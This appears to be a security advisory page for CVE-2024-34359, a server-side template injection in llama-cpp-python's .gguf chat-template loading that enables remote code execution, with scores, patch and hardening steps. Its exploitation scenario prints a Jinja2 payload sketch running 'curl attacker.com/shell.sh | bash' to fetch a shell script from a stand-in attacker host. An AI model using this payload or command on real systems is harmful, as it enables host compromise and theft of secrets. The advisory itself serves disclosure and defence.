CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE
CRITICAL PoC AVAILABLE CISA: ATTENDAny system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Risk Assessment
Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with network vector and low complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts — loading new models is routine workflow for developers, MLOps, and researchers, making this practically no barrier. Scope change (C:H/I:H/A:H) means full host takeover, not just model compromise. No evidence of active KEV exploitation at time of publication, but model-as-attack-vector is a maturing supply chain threat with high probability of real-world abuse.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
-
Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.
-
Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
-
Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
-
Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
-
Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-34359?
Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Is CVE-2024-34359 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.
How to fix CVE-2024-34359?
1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing. 2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries. 3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files. 4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers). 5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry. 6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
What systems are affected by CVE-2024-34359?
This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.
What is the CVSS score for CVE-2024-34359?
CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.
Technical Details
NVD Description
llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.
Exploitation Scenario
An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution
AI Threat Alert